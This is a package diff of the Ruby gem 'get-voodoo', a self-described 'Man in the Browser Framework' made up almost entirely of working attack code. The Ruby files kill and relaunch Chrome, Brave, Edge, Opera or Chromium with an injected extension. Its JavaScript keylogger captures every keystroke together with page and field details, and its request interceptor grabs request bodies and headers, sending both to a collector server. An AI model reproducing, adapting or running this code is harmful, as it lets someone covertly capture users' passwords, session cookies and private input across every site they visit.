get-voodoo 0.0.1

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: b0fcdaba9b3efe46744664468d43523c13515711f8dbfb7d1344d64b69ccd700
+  data.tar.gz: 802809af82cc9ecc90aff242c6033afe5bd4b411e77ebe1c0e531037d737f657
+SHA512:
+  metadata.gz: 3e89fd58e34db747ac7246c1c2ca3338cdfdcb628dc65914dc681e820ba020338db375a37e0fc43ff5b1dfe842caa12a2c4b18c56960cf2a5ddac6a6c07fa201
+  data.tar.gz: f656b8be62959200757b20abfeb1989398100be639a5295dfa7783003672edaea95a58d03282083cba4afd69c5e7a0b31f1ebce6eeaacbe0ef661df521491103

data/bin/voodoo

@@ -0,0 +1,10 @@
+#!/usr/bin/env ruby
+
+require 'bundler/setup'
+
+lib_dir = File.expand_path(File.join(File.dirname(__FILE__), '../lib'))
+$LOAD_PATH << lib_dir unless $LOAD_PATH.include?(lib_dir)
+
+require 'voodoo/cli'
+
+VOODOO::CLI.start(ARGV)

data/lib/voodoo/browser.rb

@@ -0,0 +1,112 @@
+require 'voodoo/extension'
+require 'voodoo/collector'
+
+module VOODOO
+
+    class Browser
+        attr_reader :extension
+        attr_accessor :bundle
+        attr_accessor :profile
+        attr_accessor :process_name
+
+        def initialize(bundle: nil, process_name: nil, profile: nil, extension: Extension.new)
+            @bundle = bundle
+            @extension = extension
+            @process_name = process_name
+            @collector_threads = []
+
+            @extension.manifest[:permissions] = ['tabs', '*://*/*', 'webRequest']
+            @extension.add_background_script(file: File.join(__dir__, 'js/collector.js'))
+        end
+
+        def add_script(content: nil, file: nil, matches: '*://*/*')
+            if content == nil && file != nil
+                content = File.read file
+            end
+            if content == nil
+                raise StandardError.new(':content or :file argument are required')
+            end
+            @extension.add_content_script([matches], js: [content])
+            self
+        end
+
+        def keylogger(matches: '*://*/*', url_include: '')
+            collector = Collector.new
+            collector.on_json {|jsond| yield jsond }
+            
+            options = {
+                collector_url: collector.url
+            }
+
+            @collector_threads.push(collector.thread)
+
+            keylogger_js = build_js('keylogger.js', with_options: options)
+            @extension.add_content_script(matches, js: [keylogger_js])
+        end
+
+        def intercept(matches: nil, url_include: nil, body_include: nil, header_exists: nil)
+            collector = make_collector() {|jsond| yield jsond }
+            options = {
+                matches: matches,
+                url_include: url_include,
+                body_include: body_include,
+                header_exists: header_exists,
+                collector_url: collector.url
+            }
+            background_js = build_js('intercept.js', with_options: options)
+            @extension.add_background_script content: background_js
+        end
+
+        def hijack(url = '')
+            # kill the browser process twise, to bypass close warning
+            `pkill -a -i "#{@process_name}"`
+            `pkill -a -i "#{@process_name}"`
+            sleep 0.1
+
+            profile_dir = "--profile-directory=\"#{@profile}\"" if @profile != nil
+            `open -b "#{@bundle}" --args #{profile_dir} --load-extension="#{@extension.save}" #{url}`
+
+            for thread in @collector_threads
+                thread.join    
+            end
+        end
+
+        def Browser.Chrome
+            self.new(bundle: 'com.google.Chrome', process_name: 'Google Chrome')
+        end
+
+        def Browser.Brave
+            self.new(bundle: 'com.brave.Browser', process_name: 'Brave Browser')
+        end
+
+        def Browser.Opera
+            self.new(bundle: 'com.operasoftware.Opera', process_name: 'Opera')
+        end
+
+        def Browser.Edge
+            self.new(bundle: 'com.microsoft.edgemac', process_name: 'Microsoft Edge')
+        end
+
+        def Browser.Chromium
+            self.new(bundle: 'org.chromium.Chromium', process_name: 'Chromium')
+        end
+
+        protected
+
+        def make_collector
+            collector = Collector.new
+            collector.on_json {|jsond| yield jsond }
+            @collector_threads.push(collector.thread)
+            return collector
+        end
+
+        def build_js(file, with_options: nil)
+            js = File.read(File.join(__dir__, 'js', file))
+            if with_options != nil
+                js = js.gsub('REBY_INJECTED_OPTIONS', JSON.generate(with_options))
+            end
+            return js
+        end
+    end
+
+end

data/lib/voodoo/cli.rb

@@ -0,0 +1,124 @@
+require 'thor'
+require 'json'
+require 'voodoo/browser'
+
+module VOODOO
+
+    VERSION = 'v0.0.1'
+
+    class CLI < Thor
+
+        desc 'version', 'Prints voodoo version'
+        def version
+            puts VERSION
+        end
+        
+        option :url_include, :type => :string, :aliases => :u, :default => nil
+        option :body_include, :type => :string, :aliases => :b, :default => nil
+        option :header_exists, :type => :string, :aliases => :h, :default => nil
+        option :output, :type => :string, :aliases => :o, :default => 'stdout'
+        option :site, :type => :string, :aliases => :s, :default => ''
+        option :matches, :type => :array, :aliases => :m, :default => ['<all_urls>']
+        option :browser, :type => :string, :aliases => :b, :default => 'chrome'
+        desc 'intercept', 'intercept browser requests'
+        def intercept
+            browser = get_browser options[:browser]
+            
+            output = options[:output]
+
+            if output != 'stdout'
+                output = open(output, 'a')
+            end
+
+            browser.intercept(matches: options[:matches],
+                              url_include: options[:url_include],
+                              body_include: options[:body_include]) do |req|
+                if output != 'stdout'
+                    output.puts JSON.generate(req)
+                    output.close
+                    output = open(output, 'a')
+                else
+                    puts "#{req[:method]} #{req[:url]}"
+                    if req[:body]
+                        body = req[:body]
+                        if body.length > 100
+                            body = body[0...97] + '...'
+                        end
+                        puts "BODY: #{body}"
+                    end
+                end
+            end
+
+            browser.hijack options[:site]
+        end
+
+        option :site, :type => :string, :aliases => :s, :default => ''
+        option :matches, :type => :array, :aliases => :m, :default => ['*://*/*']
+        option :browser, :type => :string, :aliases => :b, :default => 'chrome'
+        desc 'script <js/path>', 'add a content script'
+        def script(path_or_js)
+            browser = get_browser options[:browser]
+            if File.exists? path_or_js
+                browser.add_script file: path_or_js
+            else
+                browser.add_script content: path_or_js
+            end
+            browser.hijack options[:site]
+        end
+        
+        option :site, :type => :string, :aliases => :s, :default => ''
+        option :output, :type => :string, :aliases => :o, :default => 'stdout'
+        option :matches, :type => :array, :aliases => :m, :default => ['*://*/*']
+        option :browser, :type => :string, :aliases => :b, :default => 'chrome'
+        desc 'keylogger', 'records user keystrokes'
+        def keylogger
+            browser = get_browser options[:browser]
+            output = options[:output]
+
+            if output != 'stdout'
+                output = open(output, 'a')
+            end
+
+            browser.keylogger(matches: options[:matches]) do |event|
+                if output != 'stdout'
+                    output.puts JSON.generate(event)
+                else
+                    print event[:log]
+                end
+            end
+
+            browser.hijack options[:site]
+        end
+
+        def self.exit_on_failure?
+            true
+        end
+
+        private
+
+        def get_browser(name)
+            browser = nil
+            
+            case name.downcase
+                when 'chrome'
+                    browser = Browser.Chrome
+                when 'chromium'
+                    browser = Browser.Chromium
+                when 'opera'
+                    browser = Browser.Opera
+                when 'edge'
+                    browser = Browser.Edge
+                when 'brave'
+                    browser = Browser.Brave
+            end
+
+            if browser == nil
+                raise StandardError.new "Unsupported browser \"#{name}\""
+            end
+
+            return browser
+        end
+
+    end
+
+end

data/lib/voodoo/collector.rb

@@ -0,0 +1,61 @@
+require 'json'
+require 'socket'
+require 'securerandom'
+
+module VOODOO
+
+    class Collector
+        attr_reader :port
+        attr_reader :thread
+        attr_reader :token
+
+        def initialize(port = 0)
+            if port == 0
+                tmp_server = TCPServer.open('127.0.0.1', 0)
+                @port = tmp_server.addr[1]
+                tmp_server.close
+            else
+                @port = port
+            end
+            @token = SecureRandom.uuid
+        end
+
+        def url
+            return "http://localhost:#{@port}/?token=#{@token}"
+        end
+
+        def on_json
+           @thread = Thread.new do
+                server = TCPServer.new('127.0.0.1', @port)
+
+                loop {
+                    begin
+                        socket = server.accept
+                        headers = {}
+                        method, path = socket.gets.split
+
+                        unless path.include? @token
+                            socket.puts("HTTP/1.1 400 OK\r\n\r\n")
+                            socket.close
+                            next
+                        end
+                        
+                        while line = socket.gets.split(" ", 2)
+                            break if line[0] == ""
+                            headers[line[0].chop] = line[1].strip
+                        end
+
+                        post_body = socket.read(headers["Content-Length"].to_i)
+                        socket.puts("HTTP/1.1 204 OK\r\n\r\n")
+                        socket.close
+                        
+                        jsonData = JSON.parse(post_body, {:symbolize_names => true})
+                        yield jsonData
+                    rescue
+                    end
+                }
+            end
+        end
+    end
+
+end

data/lib/voodoo/extension.rb

@@ -0,0 +1,75 @@
+require 'set'
+require 'json'
+require 'tmpdir'
+require 'fileutils'
+
+module VOODOO
+
+    class Extension
+        attr_accessor :manifest
+        attr_reader :folder
+
+        def initialize
+            @id = 0
+            @folder = Dir.mktmpdir
+            @manifest = {
+                name: '~',
+                author: '~',
+                description: '',
+                version: '0.0.1',
+                manifest_version: 2,
+                background: {
+                    scripts: []
+                },
+                permissions: [],
+                content_scripts: []
+            }
+        end
+
+        def add_background_script(content: nil, file: nil)
+            if content == nil && file != nil
+                content = File.read file
+            end
+            if content == nil
+                raise StandardError.new(':content or :file argument are required')
+            end
+            path = add_file(content, with_extension: '.js')
+            @manifest[:background][:scripts] << path
+        end
+
+        def add_content_script(matches, js: [], css: [])
+            matches = [matches] unless matches.is_a? Array
+
+            js = js.map { |str| add_file(str) }
+            css = css.map { |str| add_file(str, with_extension: '.css') }
+
+            @manifest[:content_scripts] << {
+                js: js,
+                css: css,
+                matches: matches
+            }
+        end
+
+        def save
+            manifest_path = File.join(@folder, 'manifest.json')
+            File.write(manifest_path, JSON.generate(@manifest))
+            return @folder
+        end
+
+        def unlink
+            FileUtils.rm_r(@folder, :force=>true)
+        end
+
+        private
+
+        def add_file(content, with_extension: '.js')
+            @id += 1
+            filename = @id.to_s + with_extension
+            file_path = File.join(@folder, filename)
+            File.write file_path, content
+            return filename
+        end
+
+    end
+
+end

data/lib/voodoo/js/collector.js

@@ -0,0 +1,4 @@
+chrome.runtime.onMessage.addListener(function(request, sender, sendResponse) {
+    navigator.sendBeacon(request.collector_url, request.body);
+    sendResponse(1)
+});

data/lib/voodoo/js/intercept.js

@@ -0,0 +1,64 @@
+/**
+ * VOODOO Intercept
+ */
+(function () {
+    let options = REBY_INJECTED_OPTIONS;
+    let matches = options.matches || ["<all_urls>"];
+
+    if (!Array.isArray(matches)) {
+        matches = [matches];
+    }
+
+    if (!options.collector_url) {
+        return;
+    }
+
+    const requests = new Map();
+
+    chrome.webRequest.onBeforeSendHeaders.addListener(function (e) {
+        const request = requests.get(e.requestId);
+        if (!request) {
+            return;
+        }
+        requests.delete(e.requestId);
+        request.headers = e.requestHeaders;
+
+        if (options.header_exists) {
+            let found = false;
+            for (let header of request.headers) {
+                if (header.name.toLowerCase() === options.header_exists) {
+                    found = true;
+                    break;
+                }
+            }
+            if (!found) {
+                return;
+            }
+        }
+
+        navigator.sendBeacon(options.collector_url, JSON.stringify(request))
+    }, { urls: matches }, ['requestHeaders', 'extraHeaders'])
+
+    chrome.webRequest.onBeforeRequest.addListener(
+        function (request) {
+            if (request.url.startsWith(options.collector_url)) {
+                return { cancel: false };
+            }
+
+            if (options.url_include && request.url.indexOf(options.url_include) === -1) {
+                return;
+            }
+
+            try {
+                request.body = request.requestBody.raw.map(data => String.fromCharCode.apply(null, new Uint8Array(data.bytes))).join('')
+                delete request.requestBody;
+            } catch { }
+
+            requests.set(request.requestId, request);
+            return { cancel: false };
+        },
+        { urls: matches },
+        ['requestBody']
+    );
+
+})();

data/lib/voodoo/js/keylogger.js

@@ -0,0 +1,75 @@
+/**
+ * VOODOO Keylogger
+ */
+(function () {
+    sessionStorage.setItem("uuid", Math.random().toString(16).substring(2));
+    const options = REBY_INJECTED_OPTIONS;
+
+    if (!options.collector_url) {
+        return;
+    }
+
+    let output = "";
+    let lastElement = null;
+
+    function describe(element) {
+        const names = {
+            type: element.getAttribute("type"),
+            name: element.getAttribute("name"),
+            id: element.getAttribute("id")
+        };
+        let id = element.tagName + ":";
+        for (let key in names) {
+            if (names[key]) {
+                id += `${key}=${names[key]} `
+            }
+        }
+        return id;
+    }
+
+    function send_to_collector() {
+        chrome.runtime.sendMessage({
+            collector_url: options.collector_url,
+            body: JSON.stringify({ time: new Date().getTime(), origin: window.location.origin, uuid: sessionStorage.uuid, log: output })
+        }, function (response) {
+            //console.log(response);
+        });
+        output = "";
+    }
+
+    setInterval(function () {
+        if (output.length !== 0) {
+            send_to_collector();
+        }
+    }, 5000);
+
+    window.addEventListener("beforeunload", function (e) {
+        if (output.length === 0) {
+            return;
+        }
+        send_to_collector();
+    }, false);
+
+    window.addEventListener("blur", function () {
+        output += "\n[TAB LOST FOCUS]\n";
+    });
+
+    window.addEventListener("focus", function () {
+        output += `\n====== [FOCUS] ${window.location.href} (${document.title}) ======\n`;
+    });
+
+    window.addEventListener("keydown", function (event) {
+        if (lastElement !== event.path[0]) {
+            lastElement = event.path[0];
+            output += `\n==> ${describe(event.path[0])}\n`
+        }
+        if (event.key.length > 1) {
+            output += `[[${event.key}]]`;
+        } else {
+            output += event.key;
+        }
+    });
+
+    output = `\n====== ${window.location.href} (${document.title}) ======\n`;
+    send_to_collector();
+})();

data/lib/voodoo.rb

@@ -0,0 +1,4 @@
+lib_dir = File.expand_path(File.join(File.dirname(__FILE__), '../lib'))
+$LOAD_PATH << lib_dir unless $LOAD_PATH.include?(lib_dir)
+
+require 'voodoo/browser'

metadata

@@ -0,0 +1,53 @@
+--- !ruby/object:Gem::Specification
+name: get-voodoo
+version: !ruby/object:Gem::Version
+  version: 0.0.1
+platform: ruby
+authors:
+- Ron Masas
+autorequire: 
+bindir: bin
+cert_chain: []
+date: 2022-03-10 00:00:00.000000000 Z
+dependencies: []
+description: Man in the Browser Framework
+email: 
+executables:
+- voodoo
+extensions: []
+extra_rdoc_files: []
+files:
+- bin/voodoo
+- lib/voodoo.rb
+- lib/voodoo/browser.rb
+- lib/voodoo/cli.rb
+- lib/voodoo/collector.rb
+- lib/voodoo/extension.rb
+- lib/voodoo/js/collector.js
+- lib/voodoo/js/intercept.js
+- lib/voodoo/js/keylogger.js
+homepage: https://breakpoint.sh/?f=org.rubygems.voodoo
+licenses:
+- GPL-2.0
+metadata:
+  source_code_uri: https://github.com/breakpointHQ/VOODOO
+post_install_message: 
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.0.3.1
+signing_key: 
+specification_version: 4
+summary: Man in the Browser Framework
+test_files: []